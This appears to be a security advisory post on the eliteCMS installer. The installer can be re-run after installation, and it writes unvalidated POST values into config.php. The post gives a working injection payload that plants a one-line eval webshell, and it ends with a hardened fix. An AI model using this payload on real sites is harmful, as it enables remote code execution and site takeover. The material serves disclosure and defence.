eliteCMS: unlocked installer + one-liner webshell written into config.php

Posted 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation finishes, so an attacker can re-run the installation simply by requesting the installer URL again.

The second problem is that the installer writes a PHP one-liner straight into admin/includes/config.php.

Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...(omitted)...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-liner backdoor is written into /admin/includes/config.php.
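A hardened version of the step-4 writer, added here as an example (it is not eliteCMS's own code); the lock-file name and the allow-list pattern are my assumptions. It closes both holes described above: it refuses to run once a lock file exists, and it never interpolates user-supplied values into generated PHP source.

```php
<?php
// Added example: hardened replacement for the installer's step-4 config writer.
// Not eliteCMS code. Assumed: the lock file path and the allow-list pattern.
session_start();
define('INSTALL_LOCK', __DIR__ . '/install.lock');
$file = "../admin/includes/config.php";

// 1. Fix for the missing lock: once installation has completed, refuse to run again.
if (file_exists(INSTALL_LOCK)) {
    http_response_code(403);
    die("Installation already completed; delete the install directory.");
}

// 2. Fix for the unvalidated values: host, database and user names must match a
//    strict character allow-list, so a value such as "?><?php ... is rejected outright.
$allowlist = '/^[A-Za-z0-9_.:-]{1,64}$/';
foreach (['DB_SERVER', 'DB_NAME', 'DB_USER'] as $key) {
    if (!isset($_SESSION[$key]) || !is_string($_SESSION[$key])
        || !preg_match($allowlist, $_SESSION[$key])) {
        http_response_code(400);
        die("Invalid value for $key");
    }
}

// 3. Never interpolate user data into generated source. var_export() emits a
//    properly quoted and escaped PHP string literal, so quotes or "?>" in the
//    password stay inside the literal instead of ending the string or the PHP block.
$write = "<?php\n";
foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
    $value = isset($_SESSION[$key]) && is_string($_SESSION[$key]) ? $_SESSION[$key] : '';
    $write .= sprintf("define(%s, %s);\n", var_export($key, true), var_export($value, true));
}
// The connection code would follow as in the original installer. No closing "?>"
// tag is emitted, so nothing after the PHP block can be echoed by accident.

// 4. Write to a temp file and rename, so a half-written config is never served.
$tmp = $file . '.tmp';
if (file_put_contents($tmp, $write, LOCK_EX) === false || !rename($tmp, $file)) {
    http_response_code(500);
    die("Could not write config.php");
}

// 5. Create the lock so step 4 cannot be replayed by visiting the installer again.
touch(INSTALL_LOCK);
```

With the allow-list in place the payload quoted above never reaches the writer at all; var_export() is the second layer for the password, which cannot reasonably be restricted to a character set.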